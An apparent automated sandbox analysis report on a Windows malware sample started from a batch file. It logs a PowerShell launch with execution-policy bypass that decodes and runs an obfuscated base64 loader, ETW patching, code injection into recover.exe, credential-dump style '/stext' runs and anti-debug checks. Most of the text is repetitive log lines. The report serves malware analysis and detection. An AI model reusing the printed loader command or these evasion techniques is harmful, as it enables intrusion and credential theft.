Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

12_2_0040BAE3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4184	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5656	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: foregroundWindowGot 1772	Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

API coverage: 9.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep count: 4184 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep count: 5656 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_100010F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10006580 FindFirstFileExA,	5_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040B477 FindFirstFileW,FindNextFileW,	12_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041A8D8 memset,GetSystemInfo,

12_2_0041A8D8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3680732491.0000000008458000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\recover.exe

API call chain: ExitProcess graph end node

graph_13-34125

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_100060E2

Source: C:\Windows\SysWOW64\recover.exe

12_2_0040BAE3

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,

12_2_004053E1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_10004AB4 mov eax, dword ptr fs:[00000030h]

5_2_10004AB4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_1000724E GetProcessHeap,

5_2_1000724E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_100060E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_10002639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_7976.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vya2xyz3joyw1ligtscmdypsakzw5rbhjncny6vvnfa2xyz3jstkfnrwtscmdyoyrqbwrrbhjncm9tid0ga2xyz3iiqzpcvwtscmdyc2vyc1xrbhjncir1c2vya2xyz3joyw1lxgtscmdyzhdtlmjrbhjncmf0ijtpa2xyz3jmichuzwtscmdyc3qtugfrbhjncnroicrqa2xyz3jtzg9tkwtscmdyihsgicbrbhjncibxcml0a2xyz3jlluhvc2tscmdydcaiqmfrbhjncnrjacbma2xyz3jpbgugzmtscmdyb3vuzdprbhjnciakam1ka2xyz3jvbsiglwtscmdyrm9yzwdrbhjncnjvdw5ka2xyz3jdb2xvcmtscmdyien5yw5rbhjncjsgicaga2xyz3ikzmlszwtscmdytgluzxnrbhjncia9iftta2xyz3j5c3rlbwtscmdylklplkzrbhjncmlszv06a2xyz3i6umvhzgtscmdyqwxstglrbhjncm5lcygka2xyz3jqbwrvbwtscmdylcbbu3lrbhjncnn0zw0ua2xyz3juzxh0lmtscmdyrw5jb2rrbhjncmluz106a2xyz3i6vvrgogtscmdyktsgicbrbhjncibmb3jla2xyz3jhy2ggkgtscmdyjgxpbmvrbhjncibpbiaka2xyz3jmawxltgtscmdyaw5lcylrbhjncib7icaga2xyz3igicagigtscmdyawygkcrrbhjncmxpbmuga2xyz3itbwf0y2tscmdyacanxjprbhjncjo6id8oa2xyz3iukykkj2tscmdyksb7icbrbhjnciagicaga2xyz3igicagigtscmdyv3jpdgvrbhjnci1ib3n0a2xyz3igikluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jligrldgtscmdyzwn0zwrrbhjncibpbib0a2xyz3jozsbiywtscmdydgnoigzrbhjncmlszs4ia2xyz3igluzvcmtscmdyzwdyb3vrbhjncm5kq29sa2xyz3jvcibdewtscmdyyw47icbrbhjnciagicaga2xyz3igicagigtscmdydhj5ihtrbhjnciagicaga2xyz3igicagigtscmdyicagicbrbhjnciakzgvja2xyz3jvzgvkqmtscmdyexrlcybrbhjncj0gw1n5a2xyz3jzdgvtlmtscmdyq29udmvrbhjncnj0xto6a2xyz3jgcm9tqmtscmdyyxnlnjrrbhjncln0cmlua2xyz3jnkcrtywtscmdydgnozxnrbhjnclsxxs5ua2xyz3jyaw0okwtscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagjglrbhjncm5qzwn0a2xyz3jpb25db2tscmdyzgugpsbrbhjnclttexn0a2xyz3jlbs5uzwtscmdyehqurw5rbhjncmnvzglua2xyz3jnxto6vwtscmdybmljb2rrbhjncmuur2v0a2xyz3jtdhjpbmtscmdyzygkzgvrbhjncmnvzgvka2xyz3jcexrlc2tscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagv3jrbhjncml0zs1ia2xyz3jvc3qgimtscmdysw5qzwnrbhjncnrpb24ga2xyz3jjb2rligtscmdyzgvjb2rrbhjncmvkihn1a2xyz3jjy2vzc2tscmdyznvsbhlrbhjnci4iic1ga2xyz3jvcmvncmtscmdyb3vuzenrbhjncm9sb3iga2xyz3jhcmvlbmtscmdyoyagicbrbhjnciagicaga2xyz3igicagigtscmdyicbxcmlrbhjncnrlluhva2xyz3jzdcairwtscmdyegvjdxrrbhjncmluzybpa2xyz3juamvjdgtscmdyaw9uignrbhjncm9kzs4ua2xyz3iuiiatrmtscmdyb3jlz3jrbhjncm91bmrda2xyz3jvbg9yigtscmdywwvsbg9rbhjncnc7icaga2xyz3igicagigtscmdyicagicbrbhjnciagielua2xyz3j2b2tllwtscmdyrxhwcmvrbhjncnnzaw9ua2xyz3igjgluamtscmdyzwn0aw9rbhjncm5db2rla2xyz3i7icagigtscmdyicagicbrbhjnciagicaga2xyz3igigjyzwtscmdyyws7icbrbhjnciagicaga2xyz3igicagigtscmdyfsbjyxrrbhjncmnoihsga2xyz3igicagigtscmdyicagicbrbhjnciagicaga2xyz3jxcml0zwtscmdyluhvc3rrbhjnciairxjya2xyz3jvcibkdwtscmdycmluzybrbhjncmrly29ka2xyz3jpbmcgb2tscmdyciblegvrbhjncmn1dglua2xyz3jnigluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jloiakx2tscmdyiiatrm9rbhjncnjlz3jva2xyz3j1bmrdb2tscmdybg9yifjrbhjncmvkoyaga2xyz3igicagigtscmdyicagicbrbhjncn07icaga2xyz3igicagigtscmdyftsgicbrbhjncib9o30ga2xyz3jlbhnligtscmd